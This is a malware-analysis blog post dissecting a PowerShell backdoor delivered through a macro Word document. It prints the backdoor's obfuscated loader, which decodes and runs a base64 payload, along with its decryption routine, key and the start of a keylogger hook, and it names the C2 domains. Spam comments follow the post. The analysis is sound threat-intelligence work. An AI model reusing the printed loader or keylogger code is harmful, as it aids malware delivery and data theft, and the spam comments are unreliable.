PRB-Backdoor - A Fully Loaded PowerShell Backdoor with Evil Intentions


The great people at ClearSky reached out to me a couple of days ago regarding a sample that they suspected could be related to MuddyWater. 

They suspected so because the sample had some similarities with the way MuddyWater lures look like and some similarities in some PowerShell obfuscation, in specific the character substitution routine.
MuddyWater Sample

New Sample
However, after analyzing the sample and investigating it more, I was able to showcase that this is indeed something different but nonetheless interesting. This blog is a walk through my analysis and will highlight initial insights into this potential attack.


The sample that was shared with me is a macro laced word document called "Egyptairplus.doc" with an MD5 hash of fdb4b4520034be269a65cfaee555c52eThe macro code contains a function called Worker() which calls multiple other functions embedded in the document to ultimately run a PowerShell command:
"powershElL -EXEC bypASS -COmMaND "& {$pth='\Document1';$rt='';$Dt=geT-cOntEnt -patH $PTH -eNcoDInG aSCIi;FOrEach($I in $DT){iF ($I.Length -Gt 7700){$rt='';$Dt=geT-cOntEnt -patH $PTH -eNcoDInG aSCIi;FOrEach($I in $DT){iF ($I.Length -Gt 7700){$rt=$i.sPLIt('**')[2];BREak}};$rt=[syStEm.TExT.eNCODing]::asCII.gEtsTrIng([sysTEm.ConverT]::FROmbaSe64sTriNG($rT));IEX($RT);
This command looks for a chunk of data that is embedded in the actual document and begins with "**" and then takes that code and Base64 decodes it. The result is a PowerShell script that looks like this
function main
... Truncated code...
    [string]$decode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($content))
    iex $decode
Replacing iex with Write-Output and running this code will result in a second layer PowerShell script that is shown earlier in the blog and has similarities with MuddyWater code due to the use of the Character Substitution functions. Below is a snippet of the code:
function z0w2uPeX($sKPv){
    $sKPv = $sKPv.ToCharArray()
    $G8JdH = -join($sKPv)
    return $G8JdH
function FQdZ7EqW($fpuD){
    $fpuD = $fpuD.Replace('#a#', "`n").Replace('#b#', '"').Replace('#c#', "'").Replace('#d#', "$").Replace('#e#', "``")
    return $fpuD
iex(FQdZ7EqW("{4}{5}{6}{1}{2}{0}{3}" -f (z0w2uPeX("1 sd")),"Se","con","0","S","tart-Slee",(z0w2uPeX("- p")), 0))
iex(FQdZ7EqW("{2}{1}{5}{0}{4}{3}" -f (z0w2uPeX(" yeWs60")),(z0w2uPeX("ob")),"[","e",(z0w2uPeX("urT#d# =")),"ol]#d#gS", 0))
Once you replace all the iex with Write-Output you will end up with more readable code as shown below
This code still contains encoded chunks of data. Two interesting pieces are Invoker.ps1 and js.hta
The Invoker.ps1 script is used to decrypt the main Backdoor code as shown below:
$nxUHOcAE = "0ef4b1acb4394766" #This is the Key used to Decrypt the main Backdoor code
$xWCWwEep = "{path}"
[string]$BJgVSQMa = Get-Content -Path $xWCWwEep -Force
$nl3hMTam = new-object
$nl3hMTam.Mode = [System.Security.Cryptography.CipherMode]::ECB
$nl3hMTam.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$nl3hMTam.BlockSize = 128
$nl3hMTam.KeySize = 128
$nl3hMTam.Key = [System.Text.Encoding]::UTF8.GetBytes($nxUHOcAE)
$W9NYYLlk = [System.Convert]::FromBase64String($BJgVSQMa)
$Oj5PebcQ = $nl3hMTam.CreateDecryptor();
$mL9fRirD = $Oj5PebcQ.TransformFinalBlock($W9NYYLlk, 0, $W9NYYLlk.Length);
[string]$Pru8pJC5 = [System.Text.Encoding]::UTF8.GetString($mL9fRirD).Trim('*')
Write-Output $Pru8pJC5 #I replaced iex with Write-Output
start-sleep -seconds 3
When the encrypted Backdoor code is passed through this script it will be decrypted into the full fledged Backdoor code. I am sharing a snippet of the code here as the full code of the backdoor is over 2000 lines of code when properly formatted.
Notice the main function name PRB hence the name I have given it "PRB-Backdoor"


Running the sample in a sandbox did not show any network communication. However, during the analysis of the code I noticed early on a variable with the value $hash.httpAddress ="http://outl00k[.]net" This looks like the main domain that the backdoor communicates with for all of it's different functions.
Doing some Passive DNS and WHOIS lookup we can get additional information on the domain:
Domain Name:
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2018-04-25T03:32:22Z
Creation Date: 2018-01-01T11:35:58Z
Registrant Name: Simon Nitoo
Registrant Street: Tehran
Registrant City: Tehran
Registrant State/Province: Tehran
Registrant Postal Code: 231423465
Registrant Country: IR
Registrant Phone: +98.2189763584
Registrant Email:
Registry Admin ID:  
Admin Name: Simon Nitoo
Admin Street: Tehran
Admin City: Tehran
Admin State/Province: Tehran
Admin Postal Code: 231423465
Admin Country: IR
Admin Phone: +98.2189763584
Admin Email:
Registry Tech ID:  
Tech Name: Simon Nitoo
Tech Street: Tehran
Tech City: Tehran
Tech State/Province: Tehran
Tech Postal Code: 231423465
Tech Country: IR
Tech Phone: +98.2189763584
Tech Email:
Name Server:
Name Server:
The Registrant email address is also used for another domain LinLedin[.]net
Both domains are currently resolving to the following IP addresses
outl00k[.]net - 74.91.19[.]118 up until May 10, 2018
LinLedin[.]net - 5.160.124[.]99 on April 30, 2018
As of the writing of this blog, there doesn't seem to be much information about either of those domains. 


I am yet to go through the whole code of the backdoor however below is an initial look into the functionality of it based on initial analysis.
PRB Backdoor has the following functions:
  • PRB-CREATEALIVE and PRB-CREATEINTRODUCE - those two functions seem to be related to initial communication and registration with the C&C
  • PRB-HISTORY is a function that looks to grab the browsing history from different browsers including Chrome, IE and FireFox. It utilizes a sub function called GET-HISTORY
  • SNAP - takes a screenshot of the screen
  • sysinfo - gets the system info
  • And many more functions.
At some point in the code there is even what seems to be .NET/C# code snippets
  $dsc = @"
using System;
using System.IO;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using System.Text;

namespace dDumper
    public static class Program
        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;
        private const int WM_SYSTEMKEYDOWN = 0x0104;
        private const int WM_KEYUP = 0x0101;
        private const int WM_SYSTEMKEYUP = 0x0105;


The PRB-Backdoor seems to be a very interesting piece of malware that is aimed to run on the victim machine and gather information, steal passwords, log keystrokes and perform many other functions. I could not find any reference to the backdoor or its code in any public source.
I would imagine there would be other lures and samples out there and hopefully other researchers that would be able to dive deeper into the code and reveal additional details. I will do so as soon as I have additional time but I thought it would be beneficial to share these initial findings in hope to shed some light into this activity.




  1. Hi
    I am Enjoyful read your blog, I've adored viewing the change and all the diligent work you've put into your lovely home. My most loved was seeing the completed consequences of the stencil divider and the carport. I seek you have a beautiful rest after whatever is left this article. For other information in the future.
    Arlo security camera

  2. So I have been growing and juicing my own wheatgrass. I very causally read the growing section of Ann Wigmores's book on growing wheatgrass and that, with my general knowledge of sprouting seeds, I figured out the relatively simple process.
    friv jogos 4 school online
    friv 4 school unblocked
    a10 school Games for kids

  3. nice blog. thanks for sharing Devops Tutorials. It’s really Helpful for me.
    AWS Online Training

  4. Thanks for sharing. We provide full support for all your Linksys devices, including guidance for your arlo support .So if you are having issues with connecting to the Wifi or configure settings on the Linksys app, then contact us using our live chat services or our email. You can also call us using our customer support phone number.

  5. This is great information and all relevant to me. I know when I engage with my readers on my blog posts, not only does it encourage others to leave comments, but it makes my blog feel more like a community – exactly what I want!
    Data Science Training in Hyderabad

    Hadoop Training in Hyderabad

    Java Training in Hyderabad

    Python online Training in Hyderabad

    Tableau online Training in Hyderabad

    Blockchain online Training in Hyderabad

    informatica online Training in Hyderabad

    devops online Training

  6. I just loved your article on the beginners guide to starting a blog.If somebody take this blog article seriously in their life, he/she can earn his living by doing blogging.thank you for thizs article. best devops online training

  7. Thanks for sharing such a great information..Its really nice and informative..

    mulesoft training


  8. Thank you for sharing such a great information.Its really nice and informative.hope more posts from you. I also want to share some information recently i have gone through and i had find the one of the best mulesoft 4 self training

  9. I just loved your article on the beginners guide to starting a blog.If somebody take this blog article seriously in their life, he/she can earn his living by doing blogging.thank you for thizs article. pega online training , best pega online training ,
    top pega online training

  10. is the offical website used to access the Linksys admin panel. If you did not get access the Linksys router using you can try accessing the Linksys router using contact Linksys Support at +1-844-456-4180 Toll Free Phone Number.

  11. Thanks for Sharing This Article.It is very so much valuable content. I hope these Commenting lists will help to my website
    best servicenow online training

  12. Thanks for Sharing This Article.It is very so much valuable content. I hope these Commenting lists will help to my website
    servicenow online training
    best servicenow online training
    top servicenow online training

  13. Experts working for reputable service providers have expertise in fixing appliances of various brands and models. Viking, SubZero Repair in Riverside


    Yang Merupakan Agen Bandarq, Domino 99, Dan Bandar Poker Online Terpercaya di asia hadir untuk anda semua dengan permainan permainan menarik dan bonus menarik untuk anda semua

    Bonus yang diberikan NagaQQ :
    * Bonus rollingan 0.5%,setiap senin di bagikannya
    * Bonus Refferal 10% + 10%,seumur hidup
    * Bonus Jackpot, yang dapat anda dapatkan dengan mudah
    * Minimal Depo 15.000
    * Minimal WD 20.000

    Memegang Gelar atau title sebagai QQ Online Terbaik di masanya

    Games Yang di Hadirkan NagaQQ :
    * Poker Online
    * BandarQ
    * Domino99
    * Bandar Poker
    * Bandar66
    * Sakong
    * Capsa Susun
    * AduQ
    * Perang Bacarrat (New Game)

    Tersedia Deposit Via pulsa :
    Telkomsel & XL

    Info Lebih lanjut Kunjungi :
    Website : NAGAQQ
    Facebook : NagaQQ Official
    Kontakk : Info NagaQQ
    linktree : Agen Judi Online
    WHATSAPP : +855977509035
    Line : Cs_nagaQQ
    TELEGRAM : +855967014811

    agen bandarq terbaik
    Winner NagaQQ
    Daftar NagaQQ
    Agen Poker Online

  15. Thanks for Sharing This Article.It is very so much valuable content. I hope these Commenting lists will help to my website
    welcome to akilmanati

  16. Thanks for Sharing This Article.It is very so much valuable content. I hope these Commenting lists will help to my website
    servicenow online training
    best servicenow online training
    top servicenow online training


Post a Comment

Popular posts from this blog

Clearing the MuddyWater - Analysis of new MuddyWater Samples

Burping on MuddyWater